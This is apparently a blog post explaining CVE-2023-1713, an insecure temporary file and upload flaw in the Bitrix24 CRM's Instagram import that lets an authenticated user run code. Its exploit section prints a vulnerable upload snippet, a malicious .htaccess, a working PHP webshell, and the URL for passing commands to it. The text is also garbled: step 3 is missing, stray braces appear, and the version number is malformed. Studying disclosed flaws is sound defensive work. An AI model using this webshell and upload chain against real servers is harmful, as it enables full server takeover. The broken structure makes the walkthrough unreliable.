CVE-2023-1713 - How Insecure Temporary File Creation in Bitrix24 Could Let Hackers Run Their Code

In this post, we're diving deep into CVE-2023-1713, a vulnerability that affects Bitrix24's Instagram order import feature. Written for technical readers but using plain English, we’ll walk you through what went wrong, how it can be exploited, code samples, and how to protect yourself.

What is CVE-2023-1713?

CVE-2023-1713 is an insecure temporary file creation vulnerability found in the Bitrix24 CRM system, specifically in the file:

bitrix/modules/crm/lib/order/import/instagram.php

with the Bitrix24 version 22..300 running on Apache HTTP Server.

With this bug, a remote authenticated attacker (someone with a legitimate login) can upload a specially-crafted .htaccess file. This can effectively give them the ability to execute arbitrary code on the server.

Why Does This Happen?

The vulnerable code in instagram.php creates temporary files in an insecure way and does not restrict file type or name well enough when importing images. If improperly handled, it is possible for an attacker to upload files that the web server will execute.

Example Vulnerable Code Snippet

This is a simplified example inspired by the vulnerable pattern spotted in the original Bitrix24 code (actual code may slightly differ):

// Inside instagram.php (simplified)
$tmpFile = $_SERVER["DOCUMENT_ROOT"]."/upload/tmp/".basename($_FILES["IMPORT_IMAGE"]["name"]);
move_uploaded_file($_FILES["IMPORT_IMAGE"]["tmp_name"], $tmpFile);

In this snippet, there is no validation of file extension or filename, so an attacker could upload something like ".htaccess" or even a PHP script.

.htaccess triggers Apache settings.

The .htaccess file can be crafted to allow PHP code execution in the /upload/tmp/ directory.

Executes Arbitrary Code.

By browsing to https://target-site/upload/tmp/shell.php, they now control the server.

1. Create a Malicious .htaccess File

<FilesMatch "\.php$">
    SetHandler application/x-httpd-php
</FilesMatch>

2. Upload .htaccess File

Use the Instagram import feature to upload .htaccess as the image file. The web app stores it in /upload/tmp/.

Example shell.php

<?php
if(isset($_REQUEST['cmd'])){
    system($_REQUEST['cmd']);
}
?>

4. Access Your Webshell

Visit:

https://target-site/upload/tmp/shell.php?cmd=ls

Now, any command you pass with ?cmd= is executed on the server!

References

- Bitrix24 CRM – Instagram Import Vulnerability Report – CVE-2023-1713 (NVD)
- OWASP – Insecure Temporary File (CWE-377)
- Apache .htaccess Documentation

}

}

Conclusion

CVE-2023-1713 is a perfect showcase of how insecure temporary file creation and poor input validation can lead to full server compromise—even for otherwise authenticated users. If you run Bitrix24, patch NOW and audit any features that handle file uploads. Sometimes, the weakest link can be a single careless line of code.

For further reading, check out the official CVE entry and OWASP's guide on file upload security.

Stay safe!

*This article is original and written for educational purposes. Protect your systems and always get permission before testing for vulnerabilities.*

Timeline

Published on: 11/01/2023 10:15:08 UTC
Last modified on: 11/09/2023 20:37:42 UTC